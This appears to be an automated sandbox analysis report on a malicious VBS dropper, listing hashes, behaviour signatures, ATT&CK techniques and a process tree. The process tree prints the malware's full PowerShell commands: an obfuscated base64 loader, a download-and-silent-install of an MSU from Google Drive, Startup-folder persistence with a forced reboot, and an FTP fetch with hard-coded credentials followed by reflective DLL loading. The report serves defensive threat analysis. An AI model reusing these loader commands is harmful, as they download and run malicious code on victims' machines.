f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73

General

Target

f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs
Size

689KB
MD5

8fd7c00084879a12a737d7ad5b3c18d8
SHA1

ee92384a30a5765beacf8f902e22e99c9826b781
SHA256

f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73
SHA512

814c7ef16ccf2cea69f3feed9d3bee085cc956e24f48893025f336ce1e7ee6cd945f468ebaa1f22021b8e08c862d2fbd288221f646e799689ad9e1bf758122d5
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE777777777777777777777777777777777777773:xJT0FT2U

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2764	powershell.exe
2388	powershell.exe
304	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2764	powershell.exe
2388	powershell.exe
2536	powershell.exe
304	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	304	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2632 wrote to memory of 2764	2632	WScript.exe	30
PID 2632 wrote to memory of 2764	2632	WScript.exe	30
PID 2632 wrote to memory of 2764	2632	WScript.exe	30
PID 2764 wrote to memory of 2388	2764	powershell.exe	32
PID 2764 wrote to memory of 2388	2764	powershell.exe	32
PID 2764 wrote to memory of 2388	2764	powershell.exe	32
PID 2388 wrote to memory of 2536	2388	powershell.exe	33
PID 2388 wrote to memory of 2536	2388	powershell.exe	33
PID 2388 wrote to memory of 2536	2388	powershell.exe	33
PID 2536 wrote to memory of 2768	2536	powershell.exe	34
PID 2536 wrote to memory of 2768	2536	powershell.exe	34
PID 2536 wrote to memory of 2768	2536	powershell.exe	34
PID 2388 wrote to memory of 304	2388	powershell.exe	35
PID 2388 wrote to memory of 304	2388	powershell.exe	35
PID 2388 wrote to memory of 304	2388	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9せㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしDEせㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしnせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしCcせㅚしaせㅚしB0せㅚしHQせㅚしcせㅚしBzせㅚしDoせㅚしLwせㅚしvせㅚしHcせㅚしdwB3せㅚしC4せㅚしbQBlせㅚしGQせㅚしaQBhせㅚしGYせㅚしaQByせㅚしGUせㅚしLgBjせㅚしG8せㅚしbQせㅚしvせㅚしGYせㅚしaQBsせㅚしGUせㅚしLwBkせㅚしGsせㅚしdwB5せㅚしDkせㅚしZせㅚしBzせㅚしHQせㅚしbせㅚしBuせㅚしDUせㅚしYwBhせㅚしGoせㅚしYQせㅚしvせㅚしGEせㅚしZwB1せㅚしC4せㅚしdせㅚしB4せㅚしHQせㅚしLwBmせㅚしGkせㅚしbせㅚしBlせㅚしCcせㅚしIせㅚしせㅚしoせㅚしCせㅚしせㅚしXQBdせㅚしFsせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしG8せㅚしWwせㅚしgせㅚしCwせㅚしIせㅚしBsせㅚしGwせㅚしdQBuせㅚしCQせㅚしIせㅚしせㅚしoせㅚしGUせㅚしawBvせㅚしHYせㅚしbgBJせㅚしC4せㅚしKQせㅚしgせㅚしCcせㅚしSQBWせㅚしEYせㅚしcgBwせㅚしCcせㅚしIせㅚしせㅚしoせㅚしGQせㅚしbwBoせㅚしHQせㅚしZQBNせㅚしHQせㅚしZQBHせㅚしC4せㅚしKQせㅚしnせㅚしDEせㅚしcwBzせㅚしGEせㅚしbせㅚしBDせㅚしC4せㅚしMwB5せㅚしHIせㅚしYQByせㅚしGIせㅚしaQBMせㅚしHMせㅚしcwBhせㅚしGwせㅚしQwせㅚしnせㅚしCgせㅚしZQBwせㅚしHkせㅚしVせㅚしB0せㅚしGUせㅚしRwせㅚしuせㅚしCkせㅚしIせㅚしB4せㅚしG0せㅚしegBYせㅚしHgせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZせㅚしBhせㅚしG8せㅚしTせㅚしせㅚしuせㅚしG4せㅚしaQBhせㅚしG0せㅚしbwBEせㅚしHQせㅚしbgBlせㅚしHIせㅚしcgB1せㅚしEMせㅚしOgせㅚし6せㅚしF0せㅚしbgBpせㅚしGEせㅚしbQBvせㅚしEQせㅚしcせㅚしBwせㅚしEEせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしEEせㅚしJwせㅚしgせㅚしCwせㅚしIせㅚしせㅚしnせㅚしJMhOgCTIScせㅚしIせㅚしせㅚしoせㅚしGUせㅚしYwBhせㅚしGwせㅚしcせㅚしBlせㅚしFIせㅚしLgBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZwBuせㅚしGkせㅚしcgB0せㅚしFMせㅚしNせㅚしせㅚし2せㅚしGUせㅚしcwBhせㅚしEIせㅚしbQBvせㅚしHIせㅚしRgせㅚし6せㅚしDoせㅚしXQB0せㅚしHIせㅚしZQB2せㅚしG4せㅚしbwBDせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしB4せㅚしG0せㅚしegBYせㅚしHgせㅚしJせㅚしせㅚしgせㅚしF0せㅚしXQBbせㅚしGUせㅚしdせㅚしB5せㅚしEIせㅚしWwせㅚし7せㅚしCcせㅚしJQBJせㅚしGgせㅚしcQBSせㅚしFgせㅚしJQせㅚしnせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしCせㅚしせㅚしKせㅚしBnせㅚしG4せㅚしaQByせㅚしHQせㅚしUwBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚし7せㅚしDgせㅚしRgBUせㅚしFUせㅚしOgせㅚし6せㅚしF0せㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしdせㅚしB4せㅚしGUせㅚしVせㅚしせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚしpせㅚしHQせㅚしbgBlせㅚしGkせㅚしbせㅚしBDせㅚしGIせㅚしZQBXせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしTwせㅚしtせㅚしHcせㅚしZQBOせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚしpせㅚしCgせㅚしZQBzせㅚしG8せㅚしcせㅚしBzせㅚしGkせㅚしZせㅚしせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしCcせㅚしdせㅚしB4せㅚしHQせㅚしLgせㅚしxせㅚしDせㅚしせㅚしTせㅚしBMせㅚしEQせㅚしLwせㅚしxせㅚしDせㅚしせㅚしLwByせㅚしGUせㅚしdせㅚしBwせㅚしHkせㅚしcgBjせㅚしHせㅚしせㅚしVQせㅚしvせㅚしHIせㅚしYgせㅚしuせㅚしG0せㅚしbwBjせㅚしC4せㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしuせㅚしHせㅚしせㅚしdせㅚしBmせㅚしEせㅚしせㅚしMQB0せㅚしGEせㅚしcgBiせㅚしHYせㅚしawBjせㅚしHMせㅚしZQBkせㅚしC8せㅚしLwせㅚし6せㅚしHせㅚしせㅚしdせㅚしBmせㅚしCcせㅚしIせㅚしせㅚしoせㅚしGcせㅚしbgBpせㅚしHIせㅚしdせㅚしBTせㅚしGQせㅚしYQBvせㅚしGwせㅚしbgB3せㅚしG8せㅚしRせㅚしせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしCせㅚしせㅚしPQせㅚしgせㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしDsせㅚしKQせㅚしnせㅚしEせㅚしせㅚしQせㅚしBwせㅚしEoせㅚしOせㅚしせㅚし3せㅚしDUせㅚしMQせㅚしyせㅚしG8せㅚしcgBwせㅚしHIせㅚしZQBwせㅚしG8せㅚしbせㅚしBlせㅚしHYせㅚしZQBkせㅚしCcせㅚしLせㅚしせㅚしnせㅚしDEせㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしnせㅚしCgせㅚしbせㅚしBhせㅚしGkせㅚしdせㅚしBuせㅚしGUせㅚしZせㅚしBlせㅚしHIせㅚしQwBrせㅚしHIせㅚしbwB3せㅚしHQせㅚしZQBOせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBvせㅚしC0せㅚしdwBlせㅚしG4せㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしcwBsせㅚしGEせㅚしaQB0せㅚしG4せㅚしZQBkせㅚしGUせㅚしcgBDせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚし4せㅚしEYせㅚしVせㅚしBVせㅚしDoせㅚしOgBdせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしHQせㅚしeせㅚしBlせㅚしFQせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQB0せㅚしG4せㅚしZQBpせㅚしGwせㅚしQwBiせㅚしGUせㅚしVwせㅚしuせㅚしHQせㅚしZQBOせㅚしCせㅚしせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしE8せㅚしLQB3せㅚしGUせㅚしTgせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしOwせㅚしyせㅚしDEせㅚしcwBsせㅚしFQせㅚしOgせㅚし6せㅚしF0せㅚしZQBwせㅚしHkせㅚしVせㅚしBsせㅚしG8せㅚしYwBvせㅚしHQせㅚしbwByせㅚしFせㅚしせㅚしeQB0せㅚしGkせㅚしcgB1せㅚしGMせㅚしZQBTせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGwせㅚしbwBjせㅚしG8せㅚしdせㅚしBvせㅚしHIせㅚしUせㅚしB5せㅚしHQせㅚしaQByせㅚしHUせㅚしYwBlせㅚしFMせㅚしOgせㅚし6せㅚしF0せㅚしcgBlせㅚしGcせㅚしYQBuせㅚしGEせㅚしTQB0せㅚしG4せㅚしaQBvせㅚしFせㅚしせㅚしZQBjせㅚしGkせㅚしdgByせㅚしGUせㅚしUwせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚし7せㅚしH0せㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしkせㅚしHsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしawBjせㅚしGEせㅚしYgBsせㅚしGwせㅚしYQBDせㅚしG4せㅚしbwBpせㅚしHQせㅚしYQBkせㅚしGkせㅚしbせㅚしBhせㅚしFYせㅚしZQB0せㅚしGEせㅚしYwBpせㅚしGYせㅚしaQB0せㅚしHIせㅚしZQBDせㅚしHIせㅚしZQB2せㅚしHIせㅚしZQBTせㅚしDoせㅚしOgBdせㅚしHIせㅚしZQBnせㅚしGEせㅚしbgBhせㅚしE0せㅚしdせㅚしBuせㅚしGkせㅚしbwBQせㅚしGUせㅚしYwBpせㅚしHYせㅚしcgBlせㅚしFMせㅚしLgB0せㅚしGUせㅚしTgせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしewせㅚしgせㅚしGUせㅚしcwBsせㅚしGUせㅚしfQせㅚしgせㅚしGYせㅚしLwせㅚしgせㅚしDせㅚしせㅚしIせㅚしB0せㅚしC8せㅚしIせㅚしByせㅚしC8せㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしG4せㅚしdwBvせㅚしGQせㅚしdせㅚしB1せㅚしGgせㅚしcwせㅚしgせㅚしDsせㅚしJwせㅚしwせㅚしDgせㅚしMQせㅚしgせㅚしHせㅚしせㅚしZQBlせㅚしGwせㅚしcwせㅚしnせㅚしCせㅚしせㅚしZせㅚしBuせㅚしGEせㅚしbQBtせㅚしG8せㅚしYwせㅚしtせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBsせㅚしGwせㅚしZQBoせㅚしHMせㅚしcgBlせㅚしHcせㅚしbwBwせㅚしDsせㅚしIせㅚしBlせㅚしGMせㅚしcgBvせㅚしGYせㅚしLQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしHせㅚしせㅚしdQB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしXせㅚしBzせㅚしG0せㅚしYQByせㅚしGcせㅚしbwByせㅚしFせㅚしせㅚしXせㅚしB1せㅚしG4せㅚしZQBNせㅚしCせㅚしせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしFwせㅚしcwB3せㅚしG8せㅚしZせㅚしBuせㅚしGkせㅚしVwBcせㅚしHQせㅚしZgBvせㅚしHMせㅚしbwByせㅚしGMせㅚしaQBNせㅚしFwせㅚしZwBuせㅚしGkせㅚしbQBhせㅚしG8せㅚしUgBcせㅚしGEせㅚしdせㅚしBhせㅚしEQせㅚしcせㅚしBwせㅚしEEせㅚしXせㅚしせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしHせㅚしせㅚしdQB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしZせㅚしBsせㅚしG8せㅚしRgせㅚしkせㅚしCせㅚしせㅚしKせㅚしせㅚしgせㅚしG4せㅚしbwBpせㅚしHQせㅚしYQBuせㅚしGkせㅚしdせㅚしBzせㅚしGUせㅚしRせㅚしせㅚしtせㅚしCせㅚしせㅚしJwせㅚしlせㅚしEkせㅚしaせㅚしBxせㅚしFIせㅚしWせㅚしせㅚしlせㅚしCcせㅚしIせㅚしBtせㅚしGUせㅚしdせㅚしBJせㅚしC0せㅚしeQBwせㅚしG8せㅚしQwせㅚしgせㅚしDsせㅚしIせㅚしB0せㅚしHIせㅚしYQB0せㅚしHMせㅚしZQByせㅚしG8せㅚしbgせㅚしvせㅚしCせㅚしせㅚしdせㅚしBlせㅚしGkせㅚしdQBxせㅚしC8せㅚしIせㅚしBlせㅚしGwせㅚしaQBmせㅚしCQせㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしGEせㅚしcwB1せㅚしHcせㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしGwせㅚしbせㅚしBlせㅚしGgせㅚしcwByせㅚしGUせㅚしdwBvせㅚしHせㅚしせㅚしIせㅚしせㅚし7せㅚしCkせㅚしJwB1せㅚしHMせㅚしbQせㅚしuせㅚしG4せㅚしaQB3せㅚしHせㅚしせㅚしVQBcせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしYQB0せㅚしHMせㅚしYQBwせㅚしCQせㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBlせㅚしGwせㅚしaQBmせㅚしCQせㅚしOwせㅚしpせㅚしCせㅚしせㅚしZQBtせㅚしGEせㅚしTgByせㅚしGUせㅚしcwBVせㅚしDoせㅚしOgBdせㅚしHQせㅚしbgBlせㅚしG0せㅚしbgBvせㅚしHIせㅚしaQB2せㅚしG4せㅚしRQBbせㅚしCせㅚしせㅚしKwせㅚしgせㅚしCcせㅚしXせㅚしBzせㅚしHIせㅚしZQBzせㅚしFUせㅚしXせㅚしせㅚし6せㅚしEMせㅚしJwせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHせㅚしせㅚしdQB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしZせㅚしBsせㅚしG8せㅚしRgせㅚしkせㅚしDsせㅚしKQせㅚしnせㅚしHUせㅚしcwBtせㅚしC4せㅚしbgBpせㅚしHcせㅚしcせㅚしBVせㅚしFwせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBhせㅚしHQせㅚしcwBhせㅚしHせㅚしせㅚしJせㅚしせㅚしgせㅚしCwせㅚしQgBLせㅚしEwせㅚしUgBVせㅚしCQせㅚしKせㅚしBlせㅚしGwせㅚしaQBGせㅚしGQせㅚしYQBvせㅚしGwせㅚしbgB3せㅚしG8せㅚしRせㅚしせㅚしuせㅚしFせㅚしせㅚしdwBqせㅚしHMせㅚしagせㅚしkせㅚしDsせㅚしOせㅚしBGせㅚしFQせㅚしVQせㅚし6せㅚしDoせㅚしXQBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgB0せㅚしHgせㅚしZQBUせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgBQせㅚしHcせㅚしagBzせㅚしGoせㅚしJせㅚしせㅚし7せㅚしCkせㅚしdせㅚしBuせㅚしGUせㅚしaQBsせㅚしEMせㅚしYgBlせㅚしFcせㅚしLgB0せㅚしGUせㅚしTgせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBPせㅚしC0せㅚしdwBlせㅚしE4せㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBQせㅚしHcせㅚしagBzせㅚしGoせㅚしJせㅚしせㅚし7せㅚしH0せㅚしOwせㅚしgせㅚしCkせㅚしJwByせㅚしGcせㅚしOせㅚしBEせㅚしDcせㅚしbwBSせㅚしHMせㅚしZgBWせㅚしGMせㅚしcgせㅚしyせㅚしG4せㅚしQQBoせㅚしGYせㅚしaせㅚしBWせㅚしDYせㅚしRせㅚしBDせㅚしHgせㅚしUgBxせㅚしG4せㅚしcQBqせㅚしDUせㅚしagByせㅚしGIせㅚしMQせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしGUせㅚしbせㅚしBUせㅚしFEせㅚしWせㅚしせㅚしkせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZQBsせㅚしFQせㅚしUQBYせㅚしCQせㅚしewせㅚしgせㅚしGUせㅚしcwBsせㅚしGUせㅚしfQせㅚし7せㅚしCせㅚしせㅚしKQせㅚしnせㅚしHgせㅚしNせㅚしBmせㅚしGgせㅚしWgBNせㅚしHcせㅚしTgせㅚし3せㅚしFUせㅚしZQBfせㅚしDせㅚしせㅚしXwせㅚし1せㅚしF8せㅚしaQBjせㅚしHMせㅚしYgBoせㅚしDcせㅚしQwBQせㅚしDせㅚしせㅚしSQBmせㅚしFせㅚしせㅚしZせㅚしBBせㅚしDIせㅚしMQせㅚしxせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしZQBsせㅚしFQせㅚしUQBYせㅚしCQせㅚしKせㅚしせㅚしgAD0AIABlAGwAVABRAFgAJAB7ACAAKQByAGUAVgBuAGkAVwAkACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHIAZQBWAG4AaQBXACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAGUAbABUAFEAWせㅚしAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAHIAZQB3AG8AcAByAGUAVgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIAByAGUAdwBvAHAAcgBlAFYAJAAgADsA';$GBekT = $qCybe.replace('せㅚし' , 'A') ;$QlmBo = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $GBekT ) ); $QlmBo = $QlmBo[-1..-$QlmBo.Length] -join '';$QlmBo = $QlmBo.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs');powershell $QlmBo
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Verpower = $host.Version.Major.Equals(2) ;if ($Verpower) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$XQTle = 'https://drive.google.com/uc?export=download&id=';$WinVer = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($WinVer) {$XQTle = ($XQTle + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$XQTle = ($XQTle + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$jsjwP = (New-Object Net.WebClient);$jsjwP.Encoding = [System.Text.Encoding]::UTF8;$jsjwP.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$CSaXQ.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $CSaXQ.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$CSaXQ.dispose();$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $CSaXQ.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'elif/txt.uga/ajac5nltsd9ywkd/elif/moc.erifaidem.www//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2536
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8e4a0a6c7a48fa98d86235a7226fb279

SHA1
aac4f76b44265ec0af60c3aa885ba0a404b3ce8e

SHA256
61b9afd5c4b2aafd76d5b71522e6d5b78c26e03b1c0be6f80b77fb91aeaa8a87

SHA512
4d4441148fae916e7545c43831df3f05aea13da1dc3bda78bf067db38966c790ecb6820475cc3472eb57bb89822800170ea3cb872844411d7fbde8c9fe70bd4f

Download Submit
memory/2764-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

Filesize
4KB

Download
memory/2764-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2764-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-6-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2764-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-29-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

Filesize
4KB

Download
memory/2764-30-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing